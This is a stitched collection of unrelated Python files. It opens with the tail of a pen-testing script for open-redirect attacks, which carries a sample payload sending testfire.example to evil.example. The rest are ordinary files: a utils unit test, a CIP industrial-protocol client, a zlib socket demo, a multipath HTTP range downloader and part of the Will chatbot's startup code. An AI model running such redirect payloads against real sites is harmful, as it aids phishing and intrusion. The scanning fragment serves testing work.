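#   http://testfire.example/sendmail.aspx?txtEmail=http://evil.example/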
if __name__ == "__main__":
usage = '''./open_redirection.py -t testfire '''
parser = argparse.ArgumentParser(description = "open_redirection attack for pen testing",
usage = usage)
parser.add_argument("-t", "--table", required=True, help="collection that saved urls")
parser.add_argument("-p", "--payload", required=False, help="payload characters to attack")
parser.add_argument("-u", "--url", required=False, help="requests in origin_url")
parser.add_argument("-c", "--cookie", required=False, help="filename that contains a cookie")
parser.add_argument("-o", "--timeout", required=False, help="default timeout is 1 sec")
parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.1 (05/05/2014)')
args = parser.parse_args()
collection_saving_urls = args.table
timeout = args.timeout
start_time = timeit.default_timer()
os_version = sys.platform
open_redirection = open_redirection(collection_saving_urls)
processes = []
    # Fetch the URLs needed for the attack from the collection
urls = open_redirection.search_urls()
if os_version.find("win32") == -1:
for url in urls:
process = mp.Process(target = open_redirection.save_data, args=(url,))
processes.append(process)
process.start()
for item in processes:
item.join()
else:
for url in urls:
            # Run the checks sequentially on Windows instead of spawning processes.
            open_redirection.save_data(url)
end_time = timeit.default_timer()
print "*" * 120
print '\nattack is done: ', end_time - start_time
print "*" * 120
|
utilsTest.py
|
#:copyright: Copyright 2009-2010 by the Vesper team, see AUTHORS.
#:license: Dual licenced under the GPL or Apache2 licences, see LICENSE.
"""
utils unit tests
"""
import unittest
from vesper import utils
from vesper.utils import *
import threading
class utilsTestCase(unittest.TestCase):
def testSingleton(self):
class single: __metaclass__=Singleton
s1 = single()
s2 = single()
self.failUnless(s1 is s2)
def testDynException(self):
_defexception = DynaExceptionFactory(__name__)
        _defexception('test dyn error') #defines exception TestDynError
try:
raise TestDynError()
except (TestDynError), e:
self.failUnless(e.msg == "test dyn error")
try:
raise TestDynError("another msg")
except (TestDynError), e:
self.failUnless(e.msg == "another msg")
def testThreadlocalAttribute(self):
class HasThreadLocals(ObjectWithThreadLocals):
def __init__(self, bar):
#set values that will initialize across every thread
self.initThreadLocals(tl1 = 1, tl2 = bar)
test = HasThreadLocals('a')
test.tl1 = 2
test2 = HasThreadLocals('b')
self.failUnless(test.tl2 == 'a')
self.failUnless(test2.tl2 == 'b')
def threadMain():
            #make sure the initial values are what we expect
self.failUnless(test.tl1 == 1)
self.failUnless(test.tl2 == 'a')
#change them
test.tl1 = 3
test.tl2 = 'b'
            #make sure they're what we just set
self.failUnless(test.tl1 == 3)
self.failUnless(test.tl2 == 'b')
        #make sure the main thread's values are still what we set above
self.failUnless(test.tl1 == 2)
self.failUnless(test.tl2 == 'a')
thread1 = threading.Thread(target=threadMain)
thread1.start()
thread1.join()
        #make sure the values haven't been changed by the other thread
self.failUnless(test.tl1 == 2)
self.failUnless(test.tl2 == 'a')
def testDiffPatch(self):
orig = "A B C D E"
new = "A C E D"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = "A B B B E"
new = "A C C C"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = ""
new = "A C C C"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = "A B B B E"
new = ""
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = ""
new = ""
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = "A B B B E"
new = "A B B B E"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
def _testSortedDiff(self, old, new):
#print old, 'to', new
changes = diffSortedList(old, new)
#print changes
patch = opcodes2Patch(old, new, changes)
#print patch
patchList(old, patch)
#print old
self.failUnless(new == old)
def testSortedDiff(self):
old = [1, 2, 6]
new = [0, 2, 4, 9]
self._testSortedDiff(old,new)
old = []
new = [0, 2, 4, 9]
self._testSortedDiff(old,new)
old = [1, 2, 6]
new = []
self._testSortedDiff(old,new)
old = [1, 2, 6]
new = [0, 2]
self._testSortedDiff(old,new)
old = [1, 2]
new = [0, 2, 3]
self._testSortedDiff(old,new)
old = []
new = []
self._testSortedDiff(old,new)
old = [0, 2, 3]
new = [0, 2, 3]
self._testSortedDiff(old,new)
def testMonkeyPatcher(self):
class NeedsPatching(object):
def buggy(self):
return 1
class unusedname(NeedsPatching):
__metaclass__ = MonkeyPatcher
def buggy(self):
return self.newFunc()
def newFunc(self):
return 2
def addedFunc(self):
return self.__class__.__name__
test = NeedsPatching()
self.failUnless(test.buggy() == 2)
self.failUnless(test.buggy_old_() == 1)
self.failUnless(test.addedFunc() == 'NeedsPatching')
if __name__ == '__main__':
import sys
try:
test=sys.argv[sys.argv.index("-r")+1]
tc = utilsTestCase(test)
getattr(tc, test)() #run test
except (IndexError, ValueError):
unittest.main()
|
CIP.py
|
from threading import Thread
#from multiprocessing import Process as Thread
from enum import IntEnum
from PyCIP.CIPModule.connection_manager_class import ConnectionManager
from PyCIP.DataTypesModule import *
from collections import OrderedDict
from PyCIP.Tools.signaling import Signaler, SignalerM2M
import struct
class Basic_CIP():
def __init__(self, transportLayer, **kwargs):
self.trans = transportLayer
self.sequence_number = 1
self.connected = False
self.OT_connection_id = None
self.TO_connection_id = None
self.active = True
self.transport_messenger = Signaler()
self.cip_messenger = SignalerM2M()
self._cip_manager_thread = Thread(target=self._CIP_manager, args=[self.trans], name="cip_layer")
self._cip_manager_thread.start()
def _CIP_manager(self, trans):
while self.active and self.trans.connected:
message_structure = self.transport_messenger.get_message(0.1)
            if message_structure is None:
continue
packet = message_structure.message
signal_id = 0
# UnConnected Explicit
if (packet.CPF[0].Type_ID == CPF_Codes.NullAddress
and packet.CPF[1].Type_ID == CPF_Codes.UnconnectedData):
message_response = MessageRouterResponseStruct_UCMM()
message_response.import_data(packet.data)
packet.CIP = message_response
packet.data = packet.data[packet.CIP.sizeof():]
signal_id = packet.encapsulation_header.Sender_Context()
self.transport_messenger.unregister(message_structure.signal_id)
# Connected Explicit
elif(packet.CPF[0].Type_ID == CPF_Codes.ConnectedAddress
and packet.CPF[1].Type_ID == CPF_Codes.ConnectedData):
message_response = MessageRouterResponseStruct()
message_response.import_data(packet.data)
packet.CIP = message_response
packet.data = packet.data[packet.CIP.sizeof():]
signal_id = message_response.Sequence_Count
# Connected Implicit
elif(packet.CPF[0].Type_ID == CPF_Codes.SequencedAddress
and packet.CPF[1].Type_ID == CPF_Codes.ConnectedData):
print("Connected Implicit Not Supported Yet")
continue
self.cip_messenger.send_message(signal_id, packet)
return None
def get_next_sender_context(self):
return self.trans.get_next_sender_context()
def set_connection(self, OT_connection_id, TO_connection_id):
self.connected = True
self.OT_connection_id = OT_connection_id
self.TO_connection_id = TO_connection_id
def clear_connection(self):
self.connected = False
self.OT_connection_id = None
self.TO_connection_id = None
def explicit_message(self, service, EPath, data=None, receive=True):
packet = bytearray()
if self.connected:
self.sequence_number += 1
sequence_number = self.sequence_number
packet += struct.pack('H', sequence_number)
packet += explicit_request(service, EPath, data=data)
if receive:
receive_id = self.TO_connection_id if self.TO_connection_id else self.trans.get_next_sender_context()
            # if we want the manager to be notified that this message has been responded to, we must register
self.transport_messenger.register(receive_id)
if self.connected:
receipt = sequence_number
else:
receipt = receive_id
self.cip_messenger.register(receipt)
        else:
            receive_id = None
            receipt = None
# SEND PACKET
context = self.trans.send_encap(packet, self.OT_connection_id, receive_id)
return receipt
def receive(self, receive_id, time_out=5):
message = self.cip_messenger.get_message(receive_id, time_out)
if message:
return message.message
else:
return None
class ReplyService(BaseBitFieldStruct):
def __init__(self):
self.RequestResponse = BaseBitField(1)
self.Service = BaseBitField(7)
#vol1 ver 3.18 2-4.2
class MessageRouterResponseStruct(BaseStructureAutoKeys):
def __init__(self):
self.Sequence_Count = UINT()
self.Reply_Service = ReplyService()
self.Reserved = USINT()
self.General_Status = USINT()
self.Size_of_Additional_Status = USINT()
self.Additional_Status = ARRAY(WORD, self.Size_of_Additional_Status)
#vol1 ver 3.18 2-4.2
class MessageRouterResponseStruct_UCMM(BaseStructureAutoKeys):
def __init__(self):
self.Reply_Service = ReplyService()
self.Reserved = USINT()
self.General_Status = USINT()
self.Size_of_Additional_Status = USINT()
self.Additional_Status = ARRAY(WORD, self.Size_of_Additional_Status)
def explicit_request(service, EPath, data=None):
request = bytearray()
request.append(service)
EPath_bytes = EPath.export_data()
request.append(len(EPath_bytes)//2)
request += EPath_bytes
if data is not None:
request += data
return request
class CIP_Manager():
def __init__(self, transport, *EPath):
self.trans = transport
self.path = EPath
self.primary_connection = Basic_CIP(transport)
self.current_connection = self.primary_connection
self.connection_manager = ConnectionManager(self.primary_connection)
self.e_connected_connection = None
# if there is a path then we make a connection
if len(self.path):
self.forward_open(*EPath)
def forward_open(self, EPath=None, **kwargs):
if EPath == None:
self.path = EPATH()
self.path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, 2))
self.path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, 1))
else:
self.path = EPath
self._fwd_rsp = self.connection_manager.forward_open(self.path, **kwargs)
if self._fwd_rsp:
self.e_connected_connection = Basic_CIP(self.trans)
self.e_connected_connection.set_connection(self._fwd_rsp.OT_connection_ID, self._fwd_rsp.TO_connection_ID)
self.current_connection = self.e_connected_connection
return self._fwd_rsp
return False
def forward_close(self, EPath=None, **kwargs):
if EPath == None:
self.path = EPATH()
self.path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, 2))
self.path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, 1))
else:
self.path = EPath
fwd_rsp = self.connection_manager.forward_close(self.path, **kwargs)
if fwd_rsp:
self.current_connection.clear_connection()
del self.current_connection
return fwd_rsp
return False
def explicit_message(self, service, request_path, data=None, route=None, try_connected=True):
if try_connected and self.e_connected_connection and self.e_connected_connection.connected:
connection = self.e_connected_connection
receipt = connection.explicit_message(service, request_path, data=data)
elif route:
message = explicit_request(service, request_path, data=data)
connection = self.connection_manager
receipt = connection.unconnected_send(message, route)
else:
connection = self.primary_connection
receipt = connection.explicit_message(service, request_path, data=data)
return connection.receive(receipt)
def get_attr_single(self, class_int, instance_int, attribute_int, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
path.append(LogicalSegment(LogicalType.AttributeID, LogicalFormat.bit_8, attribute_int))
return self.explicit_message(CIPServiceCode.get_att_single, path, try_connected=try_connected, route=route)
def get_attr_all(self, class_int, instance_int, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
return self.explicit_message(CIPServiceCode.get_att_all, path, try_connected=try_connected, route=route)
def set_attr_single(self, class_int, instance_int, attribute_int, data, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
path.append(LogicalSegment(LogicalType.AttributeID, LogicalFormat.bit_8, attribute_int))
        return self.explicit_message(CIPServiceCode.set_att_single, path, data=data, try_connected=try_connected, route=route)
def set_attr_all(self, class_int, instance_int, attribute_int, data, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
        return self.explicit_message(CIPServiceCode.set_att_single, path, data=data, try_connected=try_connected, route=route)
class RoutingType(IntEnum):
    ExplicitDefault = 0
    ExplicitDirect = 1
    ExplicitConnected = 2
    ExplicitUnConnected = 3
    ImplicitDefault = 4
    ImplicitDirect = 5
    ImplicitConnected = 6
    ImplicitUnConnected = 7
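# --- Usage sketch (not part of the original module; illustrative only) ---
# A minimal, hedged example of driving CIP_Manager over some EtherNet/IP
# transport. `ENIP_Transport` is a hypothetical stand-in for whatever transport
# class this codebase pairs with Basic_CIP; the class/attribute numbers refer
# to the standard CIP Identity object (class 0x01, attribute 1 = Vendor ID).
#   transport = ENIP_Transport("192.168.1.10")   # hypothetical transport object
#   cip = CIP_Manager(transport)                 # unconnected messaging by default
#   cip.forward_open()                           # establish an explicit connection
#   identity = cip.get_attr_all(0x01, 1)         # read the whole Identity object
#   vendor_id = cip.get_attr_single(0x01, 1, 1)  # read just the Vendor ID
#   cip.forward_close()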
|
zlib_server.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
#__version__ = "$Id$"
#end_pymotw_header
import zlib
import logging
import SocketServer
import binascii
BLOCK_SIZE = 64
class ZlibRequestHandler(SocketServer.BaseRequestHandler):
logger = logging.getLogger('Server')
def handle(self):
compressor = zlib.compressobj(1)
# Find out what file the client wants
filename = self.request.recv(1024)
self.logger.debug('client asked for: "%s"', filename)
# Send chunks of the file as they are compressed
with open(filename, 'rb') as input:
while True:
block = input.read(BLOCK_SIZE)
if not block:
break
self.logger.debug('RAW "%s"', block)
compressed = compressor.compress(block)
if compressed:
self.logger.debug('SENDING "%s"',
binascii.hexlify(compressed))
self.request.send(compressed)
else:
self.logger.debug('BUFFERING')
# Send any data being buffered by the compressor
remaining = compressor.flush()
while remaining:
to_send = remaining[:BLOCK_SIZE]
remaining = remaining[BLOCK_SIZE:]
self.logger.debug('FLUSHING "%s"',
binascii.hexlify(to_send))
self.request.send(to_send)
return
if __name__ == '__main__':
import socket
import threading
from cStringIO import StringIO
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
logger = logging.getLogger('Client')
# Set up a server, running in a separate thread
address = ('localhost', 0) # let the kernel assign a port
server = SocketServer.TCPServer(address, ZlibRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
# Connect to the server as a client
logger.info('Contacting server on %s:%s', ip, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Ask for a file
requested_file = 'lorem.txt'
logger.debug('sending filename: "%s"', requested_file)
len_sent = s.send(requested_file)
# Receive a response
buffer = StringIO()
decompressor = zlib.decompressobj()
while True:
response = s.recv(BLOCK_SIZE)
if not response:
break
logger.debug('READ "%s"', binascii.hexlify(response))
# Include any unconsumed data when feeding the decompressor.
to_decompress = decompressor.unconsumed_tail + response
while to_decompress:
decompressed = decompressor.decompress(to_decompress)
if decompressed:
logger.debug('DECOMPRESSED "%s"', decompressed)
buffer.write(decompressed)
# Look for unconsumed data due to buffer overflow
to_decompress = decompressor.unconsumed_tail
else:
logger.debug('BUFFERING')
to_decompress = None
    # deal with data remaining inside the decompressor buffer
remainder = decompressor.flush()
if remainder:
logger.debug('FLUSHED "%s"', remainder)
        buffer.write(remainder)
full_response = buffer.getvalue()
lorem = open('lorem.txt', 'rt').read()
logger.debug('response matches file contents: %s',
full_response == lorem)
# Clean up
s.close()
server.socket.close()
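# --- Illustrative sketch (not part of the original example) ---
# The same streaming compress/decompress API used above, shown without the
# socket plumbing; relies only on the `zlib` import at the top of this file.
def _zlib_roundtrip_sketch():
    data = b'example payload ' * 64
    compressor = zlib.compressobj(1)  # level 1 (fastest), matching the handler above
    compressed = compressor.compress(data) + compressor.flush()
    decompressor = zlib.decompressobj()
    restored = decompressor.decompress(compressed) + decompressor.flush()
    assert restored == data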
|
TestServerHandler.py
|
from datetime import datetime, timezone
from wsgiref.handlers import format_date_time
from time import mktime
import http.client as hc
from socket import *
import threading
import config.config as cfg
# assign connection info
DEFAULT_IP = cfg.primary['ip']
DEFAULT_PORT = cfg.primary['port']
SECOND_IP = cfg.secondary['ip']
SECOND_PORT = cfg.secondary['port']
REQUESTED_IP = ''
REQUESTED_PORT = 8080
REQUESTED_FILE = ''
# init timestamps
CURRENT = datetime.now(timezone.utc).timestamp()
startTimeDefault = CURRENT
serverTimeDefault = CURRENT
startTimeMobile = CURRENT
END_STAMP_SECOND = CURRENT
DEFAULT_RANGE_END = 0
MOBILE_RANGE_START = 0
CONTENT_LENGTH = 0
CONTENT_TYPE = ""
isSecondConnectionAvailable = True
isAcceptRanges = True
HEAD_RESPONSE_HEADERS = None
RESPONSE_DEFAULT = b""
RESPONSE_MOBILE = b""
RESPONSE = b""
LINE = "\r\n"
HEADER = LINE + LINE
class TestServerHandler:
def __init__(self, httpServerSelf):
self.assignRequestedPath(httpServerSelf.path[1:])
self.measureBandWidth()
self.assignContentInfo()
self.calculateLoadWeight()
self.sendRangeRequest()
self.pushBackToClient(httpServerSelf)
# Assign requested ip, port and file path to global variables
@staticmethod
def assignRequestedPath(requested):
global REQUESTED_IP, REQUESTED_PORT, REQUESTED_FILE
REQUESTED_IP = requested.split(":")[0]
try:
REQUESTED_PORT = int(requested.split(":")[1].split("/")[0])
        except (IndexError, ValueError):
print("port not found")
try:
REQUESTED_FILE = requested.split("/")[1]
        except IndexError:
print("requested file not found")
# Send two HEAD requests using threads
def measureBandWidth(self):
defaultThread = threading.Thread(target=self.sendHeadDefault)
mobileThread = threading.Thread(target=self.sendHeadMobile)
defaultThread.start()
mobileThread.start()
defaultThread.join()
mobileThread.join()
# Send HEAD request over default connection
def sendHeadDefault(self):
global startTimeDefault, serverTimeDefault, HEAD_RESPONSE_HEADERS
con = hc.HTTPConnection(REQUESTED_IP, REQUESTED_PORT)
startTimeDefault = self.getNow()
con.request("HEAD", "/" + REQUESTED_FILE, body=None)
response = con.getresponse()
serverTimeDefault = self.getNow()
con.close()
HEAD_RESPONSE_HEADERS = response
# return current time as timestamp
@staticmethod
def getNow():
return datetime.now(timezone.utc).timestamp()
# Send HEAD request over second connection
def sendHeadMobile(self):
global startTimeMobile, END_STAMP_SECOND, isSecondConnectionAvailable
try:
con = socket(AF_INET, SOCK_STREAM)
con.bind((SECOND_IP, SECOND_PORT))
con.connect((REQUESTED_IP, REQUESTED_PORT))
request = "HEAD / HTTP/1.1" + LINE
request += "Connection: close" + HEADER
startTimeMobile = self.getNow()
con.sendall(request.encode('ascii'))
con.recv(2048)
            END_STAMP_SECOND = self.getNow()
con.close()
except:
print("second connection is not found")
isSecondConnectionAvailable = False
@staticmethod
def assignContentInfo():
global CONTENT_LENGTH, CONTENT_TYPE, isAcceptRanges
        if (HEAD_RESPONSE_HEADERS.getheader("accept-ranges") or "none").lower() == "none":
isAcceptRanges = False
CONTENT_LENGTH = int(HEAD_RESPONSE_HEADERS.getheader("content-length"))
CONTENT_TYPE = HEAD_RESPONSE_HEADERS.getheader("content-type")
@staticmethod
def calculateLoadWeight():
global DEFAULT_RANGE_END, MOBILE_RANGE_START
defaultStamp = serverTimeDefault - startTimeDefault
mobileStamp = END_STAMP_SECOND - startTimeMobile
if mobileStamp != 0:
defaultLoadRate = round((mobileStamp / (defaultStamp + mobileStamp)), 2)
else:
defaultLoadRate = 1
DEFAULT_RANGE_END = round(defaultLoadRate * CONTENT_LENGTH)
        MOBILE_RANGE_START = DEFAULT_RANGE_END + 1
def sendRangeRequest(self):
global RESPONSE
defaultThread = threading.Thread(target=self.useDefault)
if isSecondConnectionAvailable and isAcceptRanges:
mobileThread = threading.Thread(target=self.useMobile)
defaultThread.start()
if isSecondConnectionAvailable and isAcceptRanges:
mobileThread.start()
defaultThread.join()
if isSecondConnectionAvailable and isAcceptRanges:
mobileThread.join()
RESPONSE = RESPONSE_DEFAULT + RESPONSE_MOBILE
@staticmethod
def useDefault():
global RESPONSE_DEFAULT
if isAcceptRanges:
rangeValue = 'bytes=0-' + str(DEFAULT_RANGE_END)
headers = {'Connection': 'Keep-Alive', 'Range': rangeValue}
else:
headers = {'Connection': 'Keep-Alive'}
con = hc.HTTPConnection(REQUESTED_IP, REQUESTED_PORT)
con.request("GET", "/" + REQUESTED_FILE, body=None, headers=headers)
response = con.getresponse()
con.close()
try:
RESPONSE_DEFAULT = response.read()
except hc.IncompleteRead as e:
RESPONSE_DEFAULT = e.partial
@staticmethod
def useMobile():
global RESPONSE_MOBILE
con = socket(AF_INET, SOCK_STREAM)
con.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
con.bind((SECOND_IP, SECOND_PORT + 1))
con.connect((REQUESTED_IP, REQUESTED_PORT))
request = "GET /" + REQUESTED_FILE + " HTTP/1.1" + LINE
request += "Connection: close" + LINE
request += "Range: bytes=" + str(MOBILE_RANGE_START) + "-" + str(CONTENT_LENGTH) + HEADER
con.sendall(request.encode("ascii"))
while True:
data = con.recv(2048)
if not data:
break
RESPONSE_MOBILE += data
con.close()
RESPONSE_MOBILE = RESPONSE_MOBILE.split(HEADER.encode("utf-8"), 1)[1]
def pushBackToClient(self, httpServerSelf):
httpServerSelf.send_response(200)
httpServerSelf.send_header('Content-type', CONTENT_TYPE)
httpServerSelf.send_header('Access-Control-Allow-Origin', '*')
httpServerSelf.send_header('Date', self.getTime())
httpServerSelf.end_headers()
httpServerSelf.wfile.write(RESPONSE)
@staticmethod
def getTime():
now = datetime.now()
stamp = mktime(now.timetuple())
return format_date_time(stamp)
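# --- Worked example of the range split (hypothetical numbers) ---
# If the HEAD over the default link takes 0.2 s, the HEAD over the second link
# takes 0.1 s, and the file is 9000 bytes, calculateLoadWeight() computes
#   defaultLoadRate   = round(0.1 / (0.2 + 0.1), 2) = 0.33
#   DEFAULT_RANGE_END = round(0.33 * 9000)          = 2970
# so the default connection asks for "Range: bytes=0-2970", the second
# connection asks for "Range: bytes=2971-9000", and the two byte ranges are
# concatenated in sendRangeRequest().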
|
main.py
|
# -*- coding: utf-8 -*-
import copy
import datetime
import imp
from importlib import import_module
import inspect
import logging
from multiprocessing import Process, Queue
import operator
import os
from os.path import abspath, dirname
import re
import signal
import sys
import threading
import time
import traceback
try:
from yappi import profile as yappi_profile
except ImportError:
from will.decorators import passthrough_decorator as yappi_profile
from clint.textui import colored, puts, indent
import bottle
from will import settings
from will.backends import analysis, execution, generation, io_adapters
from will.backends.io_adapters.base import Event
from will.mixins import ScheduleMixin, StorageMixin, ErrorMixin, SleepMixin,\
PluginModulesLibraryMixin, EmailMixin, PubSubMixin
from will.scheduler import Scheduler
from will.utils import show_valid, show_invalid, error, warn, note, print_head, Bunch
# Force UTF8
if sys.version_info < (3, 0):
reload(sys) # noqa
sys.setdefaultencoding('utf8')
else:
raw_input = input
# Update path
PROJECT_ROOT = abspath(os.path.join(dirname(__file__)))
PLUGINS_ROOT = abspath(os.path.join(PROJECT_ROOT, "plugins"))
TEMPLATES_ROOT = abspath(os.path.join(PROJECT_ROOT, "templates"))
PROJECT_TEMPLATE_ROOT = abspath(os.path.join(os.getcwd(), "templates"))
sys.path.append(PROJECT_ROOT)
sys.path.append(os.path.join(PROJECT_ROOT, "will"))
def yappi_aggregate(func, stats):
if hasattr(settings, "PROFILING_ENABLED") and settings.PROFILING_ENABLED:
fname = "callgrind.%s" % (func.__name__)
try:
stats.add(fname)
except IOError:
pass
stats.save("will_profiles/%s" % fname, "callgrind")
class WillBot(EmailMixin, StorageMixin, ScheduleMixin, PubSubMixin, SleepMixin,
ErrorMixin, PluginModulesLibraryMixin):
def __init__(self, **kwargs):
if "template_dirs" in kwargs:
warn("template_dirs is now depreciated")
if "plugin_dirs" in kwargs:
warn("plugin_dirs is now depreciated")
log_level = getattr(settings, 'LOGLEVEL', logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(levelname)s] %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
)
# Bootstrap exit code.
self.exiting = False
# Find all the PLUGINS modules
try:
plugins = settings.PLUGINS
self.plugins_dirs = {}
except:
# We're missing settings. They handle that.
sys.exit(1)
# Set template dirs.
full_path_template_dirs = []
for t in settings.TEMPLATE_DIRS:
full_path_template_dirs.append(os.path.abspath(t))
# Add will's templates_root
if TEMPLATES_ROOT not in full_path_template_dirs:
full_path_template_dirs += [TEMPLATES_ROOT, ]
# Add this project's templates_root
if PROJECT_TEMPLATE_ROOT not in full_path_template_dirs:
full_path_template_dirs += [PROJECT_TEMPLATE_ROOT, ]
# Convert those to dirs
for plugin in plugins:
path_name = None
for mod in plugin.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
# Add, uniquely.
self.plugins_dirs[os.path.abspath(path_name)] = plugin
if os.path.exists(os.path.join(os.path.abspath(path_name), "templates")):
full_path_template_dirs.append(
os.path.join(os.path.abspath(path_name), "templates")
)
# Key by module name
self.plugins_dirs = dict(zip(self.plugins_dirs.values(), self.plugins_dirs.keys()))
# Storing here because storage hasn't been bootstrapped yet.
os.environ["WILL_TEMPLATE_DIRS_PICKLED"] =\
";;".join(full_path_template_dirs)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap(self):
print_head()
self.load_config()
self.bootstrap_storage_mixin()
self.bootstrap_pubsub_mixin()
self.bootstrap_plugins()
self.verify_plugin_settings()
started = self.verify_io()
if started:
puts("Bootstrapping complete.")
# Save help modules.
self.save("help_modules", self.help_modules)
puts("\nStarting core processes:")
# try:
# Exit handlers.
# signal.signal(signal.SIGINT, self.handle_sys_exit)
# # TODO this hangs for some reason.
# signal.signal(signal.SIGTERM, self.handle_sys_exit)
# Scheduler
self.scheduler_thread = Process(target=self.bootstrap_scheduler)
# Bottle
self.bottle_thread = Process(target=self.bootstrap_bottle)
# Event handler
self.incoming_event_thread = Process(target=self.bootstrap_event_handler)
self.io_threads = []
self.analysis_threads = []
self.generation_threads = []
with indent(2):
try:
# Start up threads.
self.bootstrap_io()
self.bootstrap_analysis()
self.bootstrap_generation()
self.bootstrap_execution()
self.scheduler_thread.start()
self.bottle_thread.start()
self.incoming_event_thread.start()
errors = self.get_startup_errors()
if len(errors) > 0:
error_message = "FYI, I ran into some problems while starting up:"
for err in errors:
error_message += "\n%s\n" % err
puts(colored.red(error_message))
self.stdin_listener_thread = False
if self.has_stdin_io_backend:
self.current_line = ""
while True:
for line in sys.stdin.readline():
if "\n" in line:
self.publish(
"message.incoming.stdin",
Event(
type="message.incoming.stdin",
content=self.current_line,
)
)
self.current_line = ""
else:
self.current_line += line
self.sleep_for_event_loop(2)
else:
while True:
time.sleep(100)
except (KeyboardInterrupt, SystemExit):
self.handle_sys_exit()
def verify_individual_setting(self, test_setting, quiet=False):
if not test_setting.get("only_if", True):
return True
if hasattr(settings, test_setting["name"][5:]):
with indent(2):
show_valid(test_setting["name"])
return True
else:
error("%(name)s... missing!" % test_setting)
with indent(2):
puts("""To obtain a %(name)s: \n%(obtain_at)s
To set your %(name)s:
1. On your local machine, add this to your virtual environment's bin/postactivate file:
export %(name)s=YOUR_ACTUAL_%(name)s
2. If you've deployed will on heroku, run
heroku config:set %(name)s=YOUR_ACTUAL_%(name)s
""" % test_setting)
return False
def load_config(self):
puts("Loading configuration...")
with indent(2):
settings.import_settings(quiet=False)
puts("")
@yappi_profile(return_callback=yappi_aggregate)
def verify_io(self):
puts("Verifying IO backends...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
self.valid_io_backends = []
if not hasattr(settings, "IO_BACKENDS"):
settings.IO_BACKENDS = ["will.backends.io_adapters.shell", ]
# Try to import them all, catch errors and output trouble if we hit it.
for b in settings.IO_BACKENDS:
with indent(2):
try:
path_name = None
for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
# show_valid("%s" % b)
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
if (
hasattr(cls, "is_will_iobackend")
and cls.is_will_iobackend
and class_name != "IOBackend"
and class_name != "StdInOutIOBackend"
):
c = cls()
show_valid(c.friendly_name)
c.verify_settings()
one_valid_backend = True
self.valid_io_backends.append(b)
except EnvironmentError:
puts(colored.red(" ✗ %s is missing settings, and will be disabled." % b))
puts()
missing_settings = True
except Exception:
error_message = (
"IO backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_IO_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
self.handle_sys_exit()
return False
puts()
return True
@yappi_profile(return_callback=yappi_aggregate)
def verify_analysis(self):
puts("Verifying Analysis backends...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
if not hasattr(settings, "ANALYZE_BACKENDS"):
settings.ANALYZE_BACKENDS = ["will.backends.analysis.nothing", ]
# Try to import them all, catch errors and output trouble if we hit it.
for b in settings.ANALYZE_BACKENDS:
with indent(2):
try:
path_name = None
for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
one_valid_backend = True
show_valid("%s" % b)
except ImportError:
error_message = (
"Analysis backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_ANALYZE_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
sys.exit(1)
puts()
@yappi_profile(return_callback=yappi_aggregate)
def verify_generate(self):
puts("Verifying Generation backends...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
if not hasattr(settings, "GENERATION_BACKENDS"):
settings.GENERATION_BACKENDS = ["will.backends.generation.strict_regex", ]
# Try to import them all, catch errors and output trouble if we hit it.
for b in settings.GENERATION_BACKENDS:
with indent(2):
try:
path_name = None
